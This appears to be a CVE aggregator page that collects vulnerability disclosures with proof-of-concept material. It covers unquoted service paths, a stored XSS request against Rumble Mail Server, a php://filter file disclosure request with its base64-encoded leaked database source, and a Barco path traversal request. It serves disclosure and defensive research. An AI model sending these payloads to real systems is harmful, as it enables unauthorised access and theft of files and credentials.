An Unquoted Service Path vulnerability exists in System Explorer 7.0.0 via via a specially crafted file in the SystemExplorerHelpService service executable path.

    # Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
    # Date: 2020-10-14
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://systemexplorer.net/
    # Software Link:  http://systemexplorer.net/download/SystemExplorerSetup.exe
    # Version: Version 7.0.0
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Service info:
    
    C:\Users\m507>sc qc SystemExplorerHelpService
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: SystemExplorerHelpService
            TYPE               : 20  WIN32_SHARE_PROCESS
            START_TYPE         : 3   DEMAND_START
            ERROR_CONTROL      : 0   IGNORE
            BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : System Explorer Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>
    
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43460: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exists in Ext2Fsd v0.68 via a specially crafted file in the Ext2Srv Service executable service path.

    # Exploit Title: Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
    # Date: 2021-1-19
    # Exploit Author: Mohammed Alshehri
    # Software Link:  https://sourceforge.net/projects/ext2fsd/files/latest/download
    # Version: 0.68
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    
    # Service info:
    C:\Users\m507>sc qc Ext2Srv
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: Ext2Srv
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\Ext2Fsd\Ext2Srv.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Ext2 Management Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    
    C:\Users\m507>
    
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43463: Offensive Security’s Exploit Database Archive

Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the servername parameter.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Exploit:
    POST /settings:save HTTP/1.1
    Host: 127.0.0.1:2580
    Connection: keep-alive
    Content-Length: 343
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46YWRtaW4=
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1:2580
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1:2580/settings
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    
    save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
    HTTP/1.1 302 Moved
    Location: /settings:save
    
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on <script>alert(xss.com)</script><br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
      <h1>Server settings</h1>
    
    Saving config/rumble.conf
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43461: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exists in FreeLAN 2.2 via a specially crafted file in the FreeLAN Service path.

    # Exploit Title: FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path
    # Date: 2021-1-20
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: www.freelan.org
    # Software Link: https://github.com/freelan-developers/freelan/releases/download/2.2/freelan-2.2.0-x86-install.exe
    # Version: Version 2.2
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    
    # Service info:
    C:\Users\m507>sc qc "FreeLAN Service"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: FreeLAN Service
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\FreeLAN\bin\freelan.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : FreeLAN Service
            DEPENDENCIES       : tap0901
                               : Dhcp
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>
    
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43455: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exists in bVPN 2.5.1 via a specially crafted file in the waselvpnserv service path.

    # Exploit Title: bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path
    # Date: 2021-1-19
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: https://carolcoral.github.io/no-free_vpn/
    # Software Link: https://github.com/carolcoral/no-free_vpn/releases/download/BVPN%4020190225/bVPN_2_5_1_setup.exe
    # Version: Version 2.5.1
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    
    # Service info:
    C:\Users\m507>sc qc "waselvpnserv"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: waselvpnserv
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:/Program Files (x86)/bVPN Service/bVPN/waselvpnserv.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : waselvpnserv
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43457: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exits in Vembu BDR 4.2.0.1 via a specially crafted file in the (1) hsflowd, (2) VembuBDR360Agent, or (3) VembuOffice365Agent service paths.

    # Exploit Title: Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths
    # Date: 2020-11-6
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: https://www.vembu.com/
    # Software Link: https://sg-build-release.s3.amazonaws.com/BDRSuite/V420/4202020051312/Vembu_BDR_Backup_Server_Setup_4_2_0_1_U1_GA.exe
    # Version: Version 4.2.0.1 U1
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    
    # Service info:
    C:\Users\m507>sc qc "hsflowd"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: hsflowd
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\hsflowd.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Host_sFlow_Agent
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>sc qc "VembuBDR360Agent"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: VembuBDR360Agent
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\VembuBDR360Agent.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : VembuBDR360Agent
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>sc qc "VembuOffice365Agent"
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: VembuOffice365Agent
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\Vembu\VembuBDR\..\VembuOffice365Agent\bin\VembuOffice365Agent.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : VembuOffice365Agent
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>
    
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43458: Offensive Security’s Exploit Database Archive

An unrestricted file upload at /public/admin/index.php?add_product of Ecommerce-Website v1.1.0 allows attackers to upload a webshell via the Product Image component.

CVE-2022-27435: GitHub - D4rkP0w4r/Full-Ecommece-Website-Add_Product-Unrestricted-File-Upload-RCE-POC

Simple Bakery Shop Management System v1.0 contains a file disclosure via /bsms/?page=products.

Permalink

**Simple Bakery Shop Management System File Disclosure**

*   `Note` => login to admin

**Exploit**

*   Exploit with Burp Suite

http://192.168.1.101:8080/bsms/?page\=products

![image](https://user-images.githubusercontent.com/79050415/160247964-7c8adf9f-fb75-4754-a47d-0b6a31c553a1.png)

*   Use Burp Suite capture request and payload => `Send` ![image](https://user-images.githubusercontent.com/79050415/160248025-19c24820-79ae-4522-93dc-f06f3ce3ca90.png)
*   Then decode `Base64`

PD9waHANCg0KQ2xhc3MgREJDb25uZWN0aW9uew0KICAgIHByb3RlY3RlZCAkZGI7DQogICAgZnVuY3Rpb24gX19jb25zdHJ1Y3QoKXsNCiAgICAgICAgJHRoaXMtPmRiPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywnJywnYnNtc19kYicpOw0KICAgICAgICBpZighJHRoaXMtPmRiKXsNCiAgICAgICAgICAgIGRpZSgnRGF0YWJhc2UgQ29ubmVjdGlvbiBGYWlsZXMuIEVycm9yOiAnLiR0aGlzLT5kYi0+ZXJyb3IpOw0KICAgICAgICB9DQoNCiAgICB9DQogICAgZnVuY3Rpb24gZGJfY29ubmVjdCgpew0KICAgICAgICByZXR1cm4gJHRoaXMtPmRiOw0KICAgIH0NCiAgICBmdW5jdGlvbiBfX2Rlc3RydWN0KCl7DQogICAgICAgICAkdGhpcy0+ZGItPmNsb3NlKCk7DQogICAgfQ0KfQ0KDQpmdW5jdGlvbiBmb3JtYXRfbnVtKCRudW1iZXIgPSAnJywkZGVjaW1hbD0nJyl7DQogICAgaWYoaXNfbnVtZXJpYygkbnVtYmVyKSl7DQogICAgICAgICRleCA9IGV4cGxvZGUoIi4iLCRudW1iZXIpOw0KICAgICAgICAkZGVjX2xlbiA9IGlzc2V0KCRleFsxXSkgPyBzdHJsZW4oJGV4WzFdKSA6IDA7DQogICAgICAgIGlmKCFlbXB0eSgkZGVjaW1hbCkgfHwgaXNfbnVtZXJpYygkZGVjaW1hbCkpew0KICAgICAgICAgICAgcmV0dXJuIG51bWJlcl9mb3JtYXQoJG51bWJlciwkZGVjaW1hbCk7DQogICAgICAgIH1lbHNlew0KICAgICAgICAgICAgcmV0dXJuIG51bWJlcl9mb3JtYXQoJG51bWJlciwkZGVjX2xlbik7DQogICAgICAgIH0NCiAgICB9ZWxzZXsNCiAgICAgICAgcmV0dXJuICdJbnZhbGlkIGlucHV0Lic7DQogICAgfQ0KfQ0KDQokZGIgPSBuZXcgREJDb25uZWN0aW9uKCk7DQokY29ubiA9ICRkYi0+ZGJfY29ubmVjdCgpOw\==

![image](https://user-images.githubusercontent.com/79050415/160248053-c84ba212-195d-42f3-8bca-bf84c485f810.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/160248200-f24761ec-5dbb-4f04-94ae-b251b4127dbf.png)

*   `Request`

GET /bsms/?page\=php://filter/convert.base64\-encode/resource\=DBConnection HTTP/1.1
Host: 192.168.1.101:8080
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.1.101:8080/bsms/
Accept\-Encoding: gzip, deflate
Accept\-Language: en\-US,en;q\=0.9
Cookie: PHPSESSID\=0722dtqnb1dgvuono8uubajcae
Connection: close

CVE-2022-28063: CVEs/POC.md at main · D4rkP0w4r/CVEs

Car Rental System v1.0 contains an arbitrary file upload vulnerability via the Add Car component which allows attackers to upload a webshell and execute arbitrary code.

CVE-2022-28062: CVEs/POC.md at main · D4rkP0w4r/CVEs

Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

![fulldisclosure logo](http://seclists.org/images/fulldisclosure-logo.png)**Full Disclosure mailing list archives**

_From_: Murat Aydemir <murataydemir94 () gmail com>  
_Date_: Fri, 1 Apr 2022 15:38:11 +0200  

\*I. SUMMARY\*
Title: \[CVE-2022-2623\] Barco Control Room Management Suite File Path
Traversal Vulnerability
Product: Barco Control Room Management Suite before 2.9 build 0275 and all
prior versions
Vulnerability Type: File Path Traversal
Credit by/Researcher: Murat Aydemir from Accenture Cyber Security Team
(Prague CFC)
Contact: https://twitter.com/mrtydmr75
Github: https://github.com/murataydemir

\*II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES\*
CVE Number: CVE-2022-26233
CVSSv3: Base score: 7.5 Impact 3.6 Exploitability: 3.9
CVSSv3 Vector: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Vulnerability Type: File Path Traversal
CWE ID: CWE-22 Improper Limitation of a Pathname to a Restricted Directory
('Path Traversal')

\*III. PROOF OF CONCEPT (POC) FOR CVE-2022-26233\*
Due to lack of input sanitizing inputs which come from url, an application
is vulnerable to file path traversal vulnerability. A succesfully
exploitation of this vulnerability could lead to access/read files and
directories stored on file system including application source code or
configuration and critical system files. No authentication is required to
exploit this vulnerability. An attacker who is not logged into the
application can easily exploit this vulnerability.

GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\System32\\drivers\\etc\\hosts
HTTP/1.1
Host: vulnerablehost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0)
Gecko/20100101 Firefox/81.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

\[image: file-path-traversal.PNG\]

\*IV. REFERENCE(S)\*
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26233
https://nvd.nist.gov/vuln/detail/CVE-2022-26233
https://www.barco.com/en/support/knowledge-base/kb115\*XX\*

![](http://seclists.org/fulldisclosure/2022/Apr/att-0/file-path-traversal.PNG)

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **CVE-2022-26233: Barco Control Room Management Suite File Path Traversal Vulnerability** _Murat Aydemir (Apr 01)_

Tag

#windows